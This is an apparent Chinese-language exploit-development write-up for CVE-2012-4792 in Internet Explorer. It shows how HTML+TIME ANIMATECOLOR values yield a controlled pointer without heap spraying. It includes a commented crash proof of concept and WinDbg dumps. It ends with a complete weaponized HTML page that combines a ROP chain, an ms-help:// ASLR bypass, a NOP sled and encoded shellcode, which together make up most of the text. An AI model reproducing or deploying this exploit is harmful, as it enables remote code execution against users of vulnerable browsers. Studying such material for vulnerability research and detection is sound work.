CVE-2012-4792 Exploit Without Heap Spray

前面的一篇用 Heap Spray 完成了在 Win7 下繞過 DEP 及 ASLR 的利用,這次同樣以 CVE-2012-4792 作爲例子。之前讀到國外的一篇文章:

http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/

文章提到用一種叫“HTML+TIME”的東西,通過該方法可以實現不需要 Heap Spray 就能完成 exploit,具體說明如下:

引用HTML+TIME的代碼如下:
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
        <meta>
                <?IMPORT namespace="t" implementation="#default#time2">
        </meta>
.
.
.
    <t:ANIMATECOLOR id="myanim"/>
接下來只需要構造 ANIMATECOLOR 的 values 屬性,該屬性可參考上面的最後一個知識庫鏈接,構造如下:
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
     animvalues += animvalues
}
for(i = 0; i < 21; i++) {
     animvalues += ";cyan";
}
最終產生的字符串如下形式:
“\u4141\u4141....;cyan;cyan;cyan;cyan;”
每個分號作爲分隔符,這樣一共 22 組。接下來將這個字符串通過以下方式賦值給 ANIMATECOLOR 的 values 屬性:
// Look up the t:ANIMATECOLOR element and hand it the ';'-separated
// string through its values property. `a` stays a global as in the
// original; any exception (missing element, unsupported property) is
// deliberately swallowed.
try {
     a = document.getElementById('myanim'), a.values = animvalues;
} catch (ignored) {}
由於ANIMATECOLOR的特性,a.values會根據字符串的格式來申請堆空間,申請的空間大小取決於字符串被分號分割的項數,分配後的堆空間將用每一個項(分號分割的項)的地址來進行初始化,這裏將會申請22*4個字節的堆空間,即0x58大小,每個DWORD保存每一項的地址,因此我們就控制了內存中一個指針,並能夠控制該指針指向的數據,接下來就可以進行exploit了:
<!doctype html>
<!--
  Crash PoC for CVE-2012-4792 (Internet Explorer; see the Exodus Intelligence
  analysis linked above for the root cause). This version only demonstrates
  control of EIP (0x41414141 in the WinDbg output below); it carries no
  payload. The issue was fixed by MS13-008. For detection, the HTML+TIME
  import plus a t:ANIMATECOLOR element whose values string is a long,
  mostly non-colour ';'-separated list are the features a rule can key on.
-->
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <!-- Binds the HTML+TIME (time2) behavior to the "t" namespace so that
          t:ANIMATECOLOR in the body is a live element -->
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     // Builds the values string, runs the DOM sequence from the original
     // PoC and then assigns the string to the ANIMATECOLOR element.
     // Returns nothing; all errors are swallowed.
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          // \u4141 run doubled from 2 characters until it reaches at least
          // 0xDC (220), i.e. 256 characters of 0x41 bytes
          animvalues = "\u4141\u4141"
     while(animvalues.length < 0xDC)
          {
          animvalues += animvalues
        }
     // 21 ";cyan" entries -> 22 ';'-separated items in total (see the
     // explanation above the listing)
     for(i = 0; i < 21; i++)
        {
          animvalues += ";cyan";
        }
          // DOM manipulation sequence taken from the original PoC; any
          // script error is deliberately swallowed so the page keeps running
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          // IE-specific: forces a garbage-collection pass before the values
          // string is assigned (presumably so the freed memory is reusable
          // by the next allocation — see the linked analysis)
          CollectGarbage();
          // Per the article, assigning values allocates a 22*4 = 0x58-byte
          // table holding one pointer per item; in the WinDbg dump edi
          // points at that table and its first entry is the \u4141 string
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<!-- Inline onload handler: helloWorld() returns undefined, so the eval()
     wrapper is a no-op. A CSP without 'unsafe-inline'/'unsafe-eval' would
     block this handler entirely -->
<body onload="eval(helloWorld())">
     <t:ANIMATECOLOR id="myanim"/>
     <!-- Elements looked up as e0 ("a") and e1 ("b") by the script above -->
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>
windbg 掛載後的崩潰信息如下:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???
0:008> dd edi
00216468  00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478  0023f578 0016bda0 0016bbd8 00187da0
00216488  0333bce0 0333bcf8 0333bd10 0333bd28
00216498  0333bd40 0333bd58 0333bd70 0333bd88
002164a8  0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8  0333be00 0333be18 eaa84100 ff080000
002164c8  000000fe 00000000 00000000 00000000
002164d8  00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c80  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c90  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199ca0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cb0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cc0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cd0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0  00790063 006e0061 02e80000 00000000  c.y.a.n.........
02e1ebd0  eaf06f92 ff080167 02e235dc 001f9038  .o..g....5..8...
02e1ebe0  02e8e12c 00000000 eaf06f95 ff0c0100  ,........o......
02e1ebf0  6359d910 00000001 001f9028 00000000  ..Yc....(.......
02e1ec00  eaf06f68 ff0c010a 00000000 00000000  ho..............
02e1ec10  00000001 00000000 eaf06f6b ff080100  ........ko......
02e1ec20  0021cfd0 001f9038 02e1eb78 00000000  ..!.8...x.......
02e1ec30  00000000 00000000 00000000 00000000  ................
0:008> dc poi(edi+8)
0023f5c0  00790063 006e0061 00200000 00000000  c.y.a.n... .....
0023f5d0  eaabd9a2 ff0e0100 00790063 006e0061  ........c.y.a.n.
0023f5e0  00200000 00000000 eaabd9a5 ff080100  .. .............
0023f5f0  00148098 00000001 1690030b 01700d8c  ..............p.
0023f600  eaabd9d8 ff080100 0063006e 006c0061  ........n.c.a.l.
0023f610  00700072 00000063 eaabd9db ff0c0100  r.p.c...........
0023f620  00000002 50000001 50000007 02db1318  .......P...P....
0023f630  eaabd9de ff0a0100 0074006e 00760073  ........n.t.s.v.
可以看到 edi 指向一塊大小爲 0x58 的堆空間,其中保存着指向前面分配的字符串各項的指針。這樣我們就可以控制一個指針以及該指針所指向的數據了。接下來沿用前一篇文章所用的 ROP 鏈:
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     location.href = 'ms-help://'
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          animvalues = 
          "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+
          "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+
          "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+
          "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+
          "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+
          "\u9090\u9090\ua8dc\u51bd"+               //ROP End
          "\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+
          "\u9090\u9090"+
          "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" +
          "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" +
          "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" +
          "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" +
          "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" +
          "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" +
          "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" +
          "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" +
          "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" +
          "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" +
          "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" +
          "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" +
          "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" +
          "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" +
          "\ua4b3\u7851\u431a\u1bd2\u4162";

     for(i = 0; i < 21; i++)
       {
          animvalues += ";cyan";
       }
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          CollectGarbage();
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<body onload="eval(helloWorld())">
     <t:ANIMATECOLOR id="myanim"/>
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>

這樣就可以不通過 Heap Spray 完成漏洞的利用。
